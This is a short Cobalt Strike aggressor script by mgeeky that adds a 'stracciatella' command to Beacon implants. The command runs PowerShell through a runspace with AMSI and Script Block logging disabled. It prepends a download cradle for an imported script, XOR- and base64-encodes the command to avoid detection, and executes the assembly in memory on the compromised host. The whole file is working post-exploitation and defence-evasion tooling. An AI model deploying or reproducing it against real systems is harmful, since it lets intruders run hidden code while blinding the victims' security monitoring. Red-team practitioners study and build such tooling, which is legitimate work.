#
# Stracciatella wrapper for Cobalt Strike 4.0+
#
# Author:
#   Mariusz B. / mgeeky, '20
#   (https://github.com/mgeeky)
#

$STRACCIATELLA_PATH = getFileProper(script_resource("modules"), "stracciatella.exe");

beacon_command_register(
    "stracciatella",
    "Runs mgeeky/Stracciatella Powershell runspace being even safer version of powerpick.",
    "Use: stracciatella [-v] command\n\nDescription: Runs Stracciatella in a similar fashion to powerpick/powershell.\nIf '-v' is given, will result in verbose output from Stracciatella.\nThat will create a Powershell Runspace with Script Block logging and AMSI disabled for better OPSEC.");

alias stracciatella {
    local('$args $s $args0 $cradle $opts $key $enc $verbose');

    $args = substr($0, strlen("stracciatella "));

    $verbose = "";
    if ('stracciatella -v *' iswm $0) {
        $verbose = "-v ";
        $args = substr($0, strlen("stracciatella -v "));
    }

    # generate the download cradle (if one exists) for an imported PowerShell script
    $cradle = beacon_host_imported_script($1);
    $args0 = $args;
    if(strlen($cradle) > 0) {
        $s = "; ";
        if(right($cradle) eq ";") { $s = " "; }
        $args = $cradle . $s . $args;
    }

    $key = rand(254) + 1;
    $enc = base64_encode(str_xor($args, chr($key)));
    $opts = "$verbose $+ -x $key -e -c \" $+ $enc $+ \"";

    btask($1, "Tasked Beacon to run Stracciatella: $args0", "T1093");
    bexecute_assembly!($1, $STRACCIATELLA_PATH, $opts);
}